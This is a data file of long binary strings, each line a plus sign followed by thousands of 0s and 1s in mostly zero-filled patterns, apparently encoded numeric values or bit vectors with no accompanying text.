+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101100010110100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011101010100000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011101010100000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 